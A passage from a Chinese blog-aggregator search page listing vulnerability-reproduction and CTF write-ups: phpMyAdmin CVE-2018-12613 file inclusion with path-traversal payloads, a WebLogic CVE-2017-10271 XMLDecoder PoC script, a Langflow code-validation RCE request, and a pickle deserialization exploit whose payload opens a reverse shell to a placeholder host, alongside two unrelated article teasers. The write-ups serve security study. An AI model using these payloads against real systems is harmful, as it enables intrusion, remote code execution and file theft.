首页 文章 精选 留言 我的

精选列表

搜索[可复现构建],共10015篇文章
优秀的个人博客,低调大师

借题目复现CVE-2018-12613

文件包含 蒻姬我最开始接触这个 是一道buuoj的web签到题进入靶机,查看源代码 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>Document</title> </head> <body> <!--source.php--> <br><img src="https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg" /></body> </html> 划重点 进入这个php源 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_string($page)) { echo "you can't see it"; return false; } if (in_array($page, $whitelist)) { return true; } $_page = mb_substr( $page, 0, mb_strpos($page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } $_page = urldecode($page); $_page = mb_substr( $_page, 0, mb_strpos($_page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } echo "you can't see it"; return false; } } if (! empty($_REQUEST['file']) && is_string($_REQUEST['file']) && emmm::checkFile($_REQUEST['file']) ) { include $_REQUEST['file']; exit; } else { echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />"; } ?> 再次划重点 if (! empty($_REQUEST['file']) && is_string($_REQUEST['file']) && emmm::checkFile($_REQUEST['file']) ) { include $_REQUEST['file']; exit; } else { echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />"; } ?> 看 有思路了 只要通过这个判断就会执行file传递的参数的文件,想到可能时任意文件包含。 通过引入文件时,引用的文件名,用户可控,由于传入的文件名没有经过合理的校验,或者检验被绕过,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。 再看if中的判断,file参数不为空&&是个字符串&&通过checkFile方法的检验。去看checkFIle方法。 public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_string($page)) { echo "you can't see it"; return false; } if (in_array($page, $whitelist)) { return true; } $_page = mb_substr( $page, 0, mb_strpos($page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } $_page = urldecode($page); $_page = mb_substr( $_page, 0, mb_strpos($_page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } echo "you can't see it"; return false; } 看,hint.php 在白名单里! $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_string($page)) { echo "you can't see it"; return false; } 进入hint.php 看到这样一行提示flag not here, and flag in ffffllllaaaagggg 再回想前面条件,首先必须存在并且是字符串 (必须使函数返回为true才能访问文件) if (in_array($page, $whitelist)) { return true; } $_page = mb_substr( $page, 0, mb_strpos($page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } $_page = urldecode($page); $_page = mb_substr( $_page, 0, mb_strpos($_page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } echo "you can't see it"; return false; 然后判断参数是否在白名单中; mb_strpos()的作用是查找字符串在另一个字符串中首次出现的位置,即?在前面字符串中出现的位置 而mb_substr()用以截断字符串。 然后和白名单比较。又重复了一次上面的操作。 这个涉及到phpMyAdmin的一个洞CVE-2018-12613,由于PHP会自动urldecode一次,导致我们提交%253f(?的urlencode的urlencode)的时候自动转成%3f,满足if条件,%253f/就会被认为是一个目录,从而include。就有了下面的转化 ? --> %3f --> %253f payload: file=hint.php%253f/…/…/…/…/…/…/…/ffffllllaaaagggg 关于cve-2018-12613-PhpMyadmin后台文件包含 2018年6月19日,phpmyadmin在最新版本修复了一个严重级别的漏洞. https://www.phpmyadmin.net/security/PMASA-2018-4/ 官方漏洞描述是这样的 An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the "$cfg['AllowArbitraryServer'] = true" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login requirement and runs the vulnerable code without any authentication). 问题在index.php的55~63: // If we have a valid target, let's load that script instead if (! empty($_REQUEST['target']) && is_string($_REQUEST['target']) && ! preg_match('/^index/', $_REQUEST['target']) && ! in_array($_REQUEST['target'], $target_blacklist) && Core::checkPageValidity($_REQUEST['target']) ) { include $_REQUEST['target']; exit; } 这里对于参数共有5个判断,判断通过就可以通过Include包含文件。 问题出在后两个上 $target_blacklist = array ( 'import.php', 'export.php' ); 以及Core::checkPageValidity($_REQUEST['target']): 代码在librariesclassesCore.php的443~476: public static function checkPageValidity(&$page, array $whitelist = []) { if (empty($whitelist)) { $whitelist = self::$goto_whitelist; } if (! isset($page) || !is_string($page)) { return false; } if (in_array($page, $whitelist)) { return true; } $_page = mb_substr( $page, 0, mb_strpos($page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } $_page = urldecode($page); $_page = mb_substr( $_page, 0, mb_strpos($_page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } return false; } 看,这跟上面的代码几乎是一个模子里刻出来的 然后康康验证的白名单whitelist public static $goto_whitelist = array( 'db_datadict.php', 'db_sql.php', 'db_events.php', 'db_export.php', 'db_importdocsql.php', 'db_multi_table_query.php', 'db_structure.php', 'db_import.php', 'db_operations.php', 'db_search.php', 'db_routines.php', 'export.php', 'import.php', 'index.php', 'pdf_pages.php', 'pdf_schema.php', 'server_binlog.php', 'server_collations.php', 'server_databases.php', 'server_engines.php', 'server_export.php', 'server_import.php', 'server_privileges.php', 'server_sql.php', 'server_status.php', 'server_status_advisor.php', 'server_status_monitor.php', 'server_status_queries.php', 'server_status_variables.php', 'server_variables.php', 'sql.php', 'tbl_addfield.php', 'tbl_change.php', 'tbl_create.php', 'tbl_import.php', 'tbl_indexes.php', 'tbl_sql.php', 'tbl_export.php', 'tbl_operations.php', 'tbl_structure.php', 'tbl_relation.php', 'tbl_replace.php', 'tbl_row_action.php', 'tbl_select.php', 'tbl_zoom_select.php', 'transformation_overview.php', 'transformation_wrapper.php', 'user_password.php', ); 之后phpMyAdmin的开发团队考虑到了target后面加参数的情况,通过字符串分割将问号的前面部分取出,继续匹配白名单,然后经过一遍urldecode后再重复动作。 得到payload target=db_datadict.php%253f/../../../../../../../../etc/passwd 此处再次分析胡扯文件包含漏洞的具体产生原因 程序员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,文件调用的过程一般被称为文件包含。 他们希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用, 但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。 几乎所有脚本语言都会提供文件包含的功能,但文件包含漏洞在PHP Web Application中居多而在JSP、ASP、程序中却非常少,甚至没有,这是本身语言设计的弊端(猜测 Getshell 上传图片GETshell 读取文件,读取php文件 包含日志文件获取webshell 首先找到文件存放位置 有权限读取apache配置文件或是/etc/init.d/httpd 默认位置/var/log/httpd/access_log 让日志文件插入php代码发送url请求时后插入php代码,一般使用burp suite抓包修改 curl发包插入到get请求,或是user-agent部分 包含日志文件(必须要权限包含) 举个栗子 if (isset($_GET[page])) { include $_GET[page]; } else { include "hint.PHP"; } 其中$_GET[page]使用户可以控制变量。如果没有严格的过滤就导致漏洞的出现 代码审计 包含文件的函数 include() include_once() require() require_once() 参考链接http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12613

优秀的个人博客,低调大师

Weblogic(CVE-2017-10271)漏洞复现

WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271) 漏洞编号:CVE-2017-10271 漏洞描述:WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击,近期发现此漏洞的利用方式为传播挖矿程序。 受影响WebLogic版本:10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0。 A、环境搭建 不解释 B、漏洞利用: 1、初步判断:访问http://192.168.8.148:7001/wls-wsat/CoordinatorPortType11,存在下图则说明可能存在漏洞 2、构造POST包进行测试,写入test.txt POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: 192.168.8.148:7001 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Content-Type: text/xml Content-Length: 756 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.6.0" class="java.beans.XMLDecoder"> <object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.txt</string><void method="println"> <string>xmldecoder_vul_test</string></void><void method="close"/> </object> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> PS:wls-wsat路径 /root/Oracle/Middleware//user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat/ 3、访问test.txt,漏洞验证成功 Python验证脚本: #!/usr/bin/env python # coding:utf-8 import requests from sys import argv headers = { 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Upgrade-Insecure-Requests': '1', 'Content-Type': 'text/xml' } def Webogic_XMLDecoder_poc(url): #url="http://192.168.8.148:7001" posturl=url+'/wls-wsat/CoordinatorPortType' data = ''' <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.6.0" class="java.beans.XMLDecoder"> <object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.txt</string><void method="println"> <string>xmldecoder_vul_test</string></void><void method="close"/> </object> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> ''' print url try: r=requests.post(posturl,data=data,headers=headers,timeout=5) geturl=url+"/wls-wsat/test.txt" #print geturl check_result = requests.get(geturl,headers=headers,timeout=5) if 'xmldecoder_vul_test' in check_result.text: print u"存在WebLogic WLS远程执行漏洞(CVE-2017-10271)" except: pass if __name__ == '__main__': if len(argv) == 1: print "Please input python Webogic_XMLDecoder_poc.py http://xxxx:7001" exit(0) else: url = argv[1] Webogic_XMLDecoder_poc(url) 验证截图: 参考文章: https://github.com/ysrc/xunfeng/blob/master/vulscan/vuldb/weblogic_CVE_2017_10271.py http://www.cnblogs.com/sevck/p/8092760.html http://blog.csdn.net/qq_27446553/article/details/78952010

优秀的个人博客,低调大师

GEO 服务和网页优化、AI 问答引流有什么区别:一套可复现的 AI 可见度评估方法

很多团队把 GEO(Generative Engine Optimization,生成式引擎优化)理解成“再做一遍 SEO”,或者理解成“去 AI 问答平台铺内容引流”。这两种理解都会让项目在两周左右暴露问题:网页排名没掉,但 AI 回答里不出现品牌;问答内容发了不少,但模型复测时引用消失。本文迪普智见(DeepIntelli)不做服务商排名,而是把这三类工作的工程边界、数据模型和复测方法讲清楚,方便技术团队判断自己买到的到底是什么。

优秀的个人博客,低调大师

量子加密视频会议系统解决方案:构建可管、可控、可审计的高安全音视频通信

在政务、央国企、金融、能源、科研及关键信息基础设施等场景中,视频会议往往承载经营决策、指挥调度、项目评审和敏感业务沟通。传统视频会议已经普遍采用身份认证、权限控制和经典密码算法,但面对长期保密、密钥安全和未来计算能力演进等要求,部分组织开始评估量子密钥分发与视频会议系统的融合应用。

优秀的个人博客,低调大师

【漏洞复现】Langflow框架远程命令执行漏洞

资产收集 ``` 鹰图平台 web.title="Langflow" ``` ![](https://developer.qcloudimg.com/http-save/yehe-9694622/dc7412cbc4bc15b99a7b9a92d89ba387.png) 发送请求 ``` POST /api/v1/validate/code HTTP/1.1 Host: Content-Type: application/json Content-Length: 112 { "code": "@exec('raise Exception(__import__(\"subprocess\").check_output([\"id\"]))')\ndef foo():\n pass" } ``` 返回包 ![](https://developer.qcloudimg.com/http-save/yehe-9694622/da551dc21478d4c5944d966e06b8b786.png) 批量验证脚本

优秀的个人博客,低调大师

复现强网杯python is the best language 2

参考文献:https://xz.aliyun.com/t/2219http://120.77.209.122/index.php/archives/25/ 源码下载下来后,是基于flask框架,先查看路由文件routes.py,里面功能大部分是基于登陆的。 在others.py的最后有这样的内容 2.png load()函数有一个unpkler函数用于反序列化参数(file),如果file可控那么这就是一个反序列化漏洞。 借用下大佬的payload,理解下这个。 用下面的脚本(12.py)进行序列化payload的生成: import os from pickle import Pickler as Pkler import commands class hhh(object): def __reduce__(self): return (os.system,("whoami",)) evil = hhh() def dump(file): pkler = Pkler(file) pkler.dump(evil) with open("test","wb") as f: dump(f) 测试反序列化漏洞(13.py): from pickle import Unpickler as Unpkler from io import open as Open def LOAD(file): unpkler = Unpkler(file) return Unpkler(file).load() with Open("test","rb") as f: LOAD(f) 执行会12.py后,会在12.py的同级目录下生成test,执行13.py会显示出用户信息 全局搜索load()函数,发现它在Mycache.py的FileSystemCache类中有多次引用。(代码太长了,贴下有用的) 2.png 跟入_get_filename方法 2.png 可以看到将传入的字符串key进行MD5,并将其返回。通过全局搜索,发现在Mysession.py的open_session中调用了key 2.png 1.png 其中self.key_prefix为bdwsessions,因此假设cookie中的sesssion值为pleated,则self.key_prefix + sid即为bdwsessionspleated,然后这串字符串进行MD5得到的结果0ab5423aafb316e9c299e0bb853d0c11。这样就可以控制file了。 攻击流程 ①本地生成序列化文件,并且进行十六进制编码 ②通过第一关的sql注入,将本地生成的payload,写入服务器上的session文件,指定文件名为MD5(bdwsessionspleated),这样我们在访问/index的时候把cookie中的session值改为pleated,触发open_session中的self.cache.get就可以进行反序列化攻击了 沙箱逃逸 源码还设置了沙箱/黑名单来防止某些函数的执行,比如前面的os.system就被禁用了 2.png 此处过滤了大多数函数,但是 commands.getoutput和subprocess.Popen()并没有过滤,payload用的是 commands.getoutput import cPickle import commands class Exp(object): def __reduce__(self): return (commands.getoutput,("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"yourip\",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'",)) e = Exp() poc = cPickle.dumps(e) print '0x'+poc.encode('hex') 在注册的邮箱处填入: test12'/**/union/**/select/**/0x63636f....../**/into/**/dumpfile/**/'/tmp/ffff/0ab5423aafb316e9c299e0bb853d0c11'#@test12.com 注册后出现Please use a different email address.。说明写入成功 然后访问http://39.107.32.29/:20000/index 抓包修改session值为pleated 反弹shell nc -l -p 8181 -vvv 查看flag即可。

资源下载

更多资源
Nacos

Nacos

Nacos /nɑ:kəʊs/ 是 Dynamic Naming and Configuration Service 的首字母简称,一个易于构建 AI Agent 应用的动态服务发现、配置管理和AI智能体管理平台。Nacos 致力于帮助您发现、配置和管理微服务及AI智能体应用。Nacos 提供了一组简单易用的特性集,帮助您快速实现动态服务发现、服务配置、服务元数据、流量管理。Nacos 帮助您更敏捷和容易地构建、交付和管理微服务平台。

Spring

Spring

Spring框架(Spring Framework)是由Rod Johnson于2002年提出的开源Java企业级应用框架,旨在通过使用JavaBean替代传统EJB实现方式降低企业级编程开发的复杂性。该框架基于简单性、可测试性和松耦合性设计理念,提供核心容器、应用上下文、数据访问集成等模块,支持整合Hibernate、Struts等第三方框架,其适用范围不仅限于服务器端开发,绝大多数Java应用均可从中受益。

Rocky Linux

Rocky Linux

Rocky Linux(中文名:洛基)是由Gregory Kurtzer于2020年12月发起的企业级Linux发行版,作为CentOS稳定版停止维护后与RHEL(Red Hat Enterprise Linux)完全兼容的开源替代方案,由社区拥有并管理,支持x86_64、aarch64等架构。其通过重新编译RHEL源代码提供长期稳定性,采用模块化包装和SELinux安全架构,默认包含GNOME桌面环境及XFS文件系统,支持十年生命周期更新。

WebStorm

WebStorm

WebStorm 是jetbrains公司旗下一款JavaScript 开发工具。目前已经被广大中国JS开发者誉为“Web前端开发神器”、“最强大的HTML5编辑器”、“最智能的JavaScript IDE”等。与IntelliJ IDEA同源,继承了IntelliJ IDEA强大的JS部分的功能。

用户登录
用户注册